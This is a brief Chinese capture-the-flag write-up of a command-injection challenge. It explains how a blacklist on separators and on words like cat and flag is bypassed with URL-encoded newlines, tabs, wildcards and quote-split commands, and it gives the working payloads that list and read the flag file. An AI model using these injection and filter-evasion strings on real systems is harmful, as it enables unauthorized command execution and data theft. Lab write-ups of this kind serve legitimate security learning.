开启题目
查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理
发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问
127.0.0.1%0als
用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过
127.0.0.1%0als%09*here
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php